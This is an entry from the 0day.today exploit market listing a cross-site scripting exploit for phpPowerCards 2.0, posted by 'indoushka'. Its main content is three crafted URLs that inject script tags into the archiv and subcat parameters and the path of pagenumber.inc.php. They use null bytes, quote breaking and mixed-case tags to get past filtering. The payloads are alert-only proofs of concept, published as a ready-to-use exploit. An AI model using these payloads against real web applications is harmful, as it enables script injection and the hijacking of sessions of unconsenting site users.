[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpPowerCards 2.0 Cross Site Scripting Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10451
Category
web applications
Date add
26-12-2009
Platform
unsorted
====================================================
phpPowerCards 2.0 Cross Site Scripting Vulnerability
====================================================

========================================================================================                 
| # Title    : phpPowerCards 2.0 Cross Site Scripting Vulnerability                    |
| # Author   : indoushka                                                               |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Script   : phpPowerCards 2.0 - Get your copy at www.giombetti.com                  |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : XSS (!m Grazy in L0v3 you XSS)                                          |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1-http://127.0.0.1/immagini/pagenumber.inc.php?archiv=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&subcat=hacked-by-indoushkat&start%5BPic%5D=0
|
| 2- http://127.0.0.1/immagini/pagenumber.inc.php?archiv=indoushka@hotmail.com&subcat=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&Souknaamane%5BPic%5D=0
|
| 3- http://127.0.0.1/immagini/pagenumber.inc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>



#  0day.today [2024-11-16]  #